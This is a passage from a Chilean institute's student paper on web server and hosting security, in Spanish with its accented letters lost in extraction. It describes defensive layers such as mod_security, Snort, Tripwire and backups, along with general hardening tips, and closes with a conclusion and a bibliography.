Componente: Firewall de aplicacin.
Objetivo: Proteger nuestras aplicaciones Web de uso malicioso
Ejemplo: mod_security
Muchas aplicaciones Web son inseguras, una no adecuada validacin de variables y formularios
puede ser la puerta de entrada para hacker, los firewalls de aplicaciones protegen nuestras
aplicaciones de uso malicioso.
Quinta lnea
Componente: HIDS activos
Objetivo: Examinar los paquetes entrantes en busca de ataques conocidos
Ejemplo: SNORT
estos sistemas verifican el trfico entrante y lo comparan con patrones de ataque conocidos y
en base a eso pueden tomar acciones.
-
8/9/2019 Seguridad en servidores web y hosting
26/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 26 de 30
Sexta lnea
Componente: HIDS pasivos
Objetivo: Detectar intrusiones recientes o en proceso
Ejemplo: Tripwire
La idea bsica detrs de estos sistemas es saber con exactitud si una intrusin ha ocurrido
y saber que partes del sistema fueron modificados, de esta manera podemos planear la recuperacin
y parcheo del sistema
Sptima lnea
BACKUP: Despus de una intrusin, esto es lo nico que le quedar; asegrese de que realizar
peridicamente copias de respaldo y mensualmente haga pruebas de restauracin.
Consejos generales de seguridad:
Proteja su computadora personal tanto como su servidor, de nada vale proteger su
server si un hacker puede robarle su contrasea fcilmente de su computadora.
Revise los logs diariamente;
Investigue cualquier anomala.
Mantngase informado acerca de las ltimas amenazas de seguridad.
Parta de la premisa de que NO existe un servidor impenetrable solo difcil de comprometer.
Seguridad no es instalar paquetes de seguridad en su servidor, es una filosofa de trabajo.
Investigar cualquier Anomala
-
8/9/2019 Seguridad en servidores web y hosting
27/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 27 de 30
Otras consideraciones de seguridad, vistas desde otro punto de
vista:
Usar siempre software en su ltima versin release (estable):Esto ya que las
ltimas versiones traen normalmente resueltos problemas de seguridad detectados que podran ser
usados en contra de un servidor.
Instalar solo los servicios necesarios que se van a utilizar: (por ejemplo Servidor
Web o Servidor de base de datos), nunca instalar servicios que no se uti lizarn como servidores de
correo innecesarios y servicios de compartir de archivos entre otros.
Cambiar puertos por defecto: a las aplicaciones comunes que se puedan considerar
vulnerables.
(Ejemplo: MySQL).
Cerrar todos los puertos del servidor que no sean estrictamente necesarios:
normalmente para un servidor Web se requiere el puerto 80, el puerto de correo a utilizar (solo de
requerirse un servicio de correo) y algn puerto para conexin remota al servidor como el 22 para ssh,
el cual se recomienda cambiar.
Instalar un firewall:si se usa linux iptables est perfecto, si se usa windows la versin gratuita de
Zone Alarm es una buena alternativa
No instalar los siguientes servicios en los servidores Web:
Finger
SNMP
Si se desea instalar un FTP, en su lugar usar SFTP.
Mantener constantemente actualizado el software instalado(Incluido el Sistema
Operativo): de esta forma se tienen siempre las versiones de las aplicaciones que tienen corregidos
fallos de seguridad.
No permitir en los accesos SSH el ingreso del usuario Root:solo se podr acceder a
l mediante algn usuario previamente autenticado ejecutando las instrucciones "su" o "sudo -s".
-
8/9/2019 Seguridad en servidores web y hosting
28/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 28 de 30
Usar siempre contraseas seguras:con ms de 10 caracteres que incluyan letras
maysculas, letras
minsculas, smbolos y nmeros.
No crear archivos PHPINFO pblicos, ni instalar phpmyadmin en servidores.
Si se usa Tomcat, borrar los archivos de administracin por defecto.
Crear pginas de error genricoque no entreguen informacin sobre el servidor de
aplicaciones.
Ocultar los errores y excepcionesde las aplicaciones para los diferentes lenguajes de
programacin usados, en su lugar enviarlos siempre a los archivos de Log.
No dejar pblico contenido que no sea estrictamente necesario, por ejemplo dejar
respaldos de sitios, dump de bases de datos, archivos con informacin sensible u otros.
-
8/9/2019 Seguridad en servidores web y hosting
29/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Pgina 29 de 30
Conclusiones
El mundo va evolucionando. Todos quieren ser algo ms. Haciendo una breve analoga, aumentan en
Chile los hijos que estudian carreras universitarias dentro de los quintiles ms pobres, o donde son
ellos el primer profesional de la familia.
Los sistemas informticos son, en parte, parecidos. No se quedan atrs. Avanzan constantemente.
Debido a esto, no es sorpresa que algunos sistemas vayan quedando obsoletos, o con el pasar de los
das nos encontremos con noticias de algn gran avance tecnolgico.
Pero as como lo bueno evoluciona: lo malo avanza de igual forma.
Siendo una suerte de Ying-Yang de la informtica, las nuevas formas de ataques, los virus, y todo lo
que constituya la explotacin de las vulnerabilidades, van corriendo una carrera a brazo partido con
las formas de evitar, contrarrestar y / o prevenirles, que van surgiendo.
Y esto es lo que hace interesante lo anteriormente planteado.
En uno de los diarios murales del instituto ITC, hay una cita a Bill Gates, en la que afirma que los
virus son formas de vida. Formas de vida que han mantenido en vela a ms de un informtico, por
cierto, pero que son necesarias para este proceso constante de evolucin.
Volviendo al primer prrafo de esta conclusin: debido a que todo va evolucionando, con el pasar del
tiempo, cualquier sistema se convertir en vulnerable. Ergo, debemos estar a la sombra de todo lo
que pueda vulnerar nuestros servidores o nuestras pginas, para hacerle frente. Sobre todo, si
queremos ser informticos, por cierto.
Y en caso de que seamos quienes contratamos un servicio de hosting, siempre ser recomendable
tener un buen servicio, y de esta forma acortar el rango de posibilidades de tener problemas con el
negocio que sostenemos va Internet, por ejemplo.
No en vano, dicen que Juan Segura vivi muchos aos.
Son las humildes palabras de los integrantes del grupo que hizo el presente trabajo.
-
8/9/2019 Seguridad en servidores web y hosting
30/30
Instituto Tecnolgico de Chile Seguridad en Servidores Web y Hosting
Bibliografa:
Wikipedia http://www.wikipedia.org/es
Ordenadores y porttiles http://www.ordenadores-y-portatiles.com/
Proyecto Teleducacin http://www.sipan.inictel.gob.pe/users
InternetLab http://www.internetlab.es
Masadelante.com http://www.masadelante.com
Topbits.com http://www.topbits.com
Gobierno de Chile www.gobiernodechile.cl
Centro de Informtica y Telecomunicaciones de la Fuerza Area de Chile www.fach.cl
Escuela de Telecomunicaciones del Ejrcito de Chile www.esctel.cl/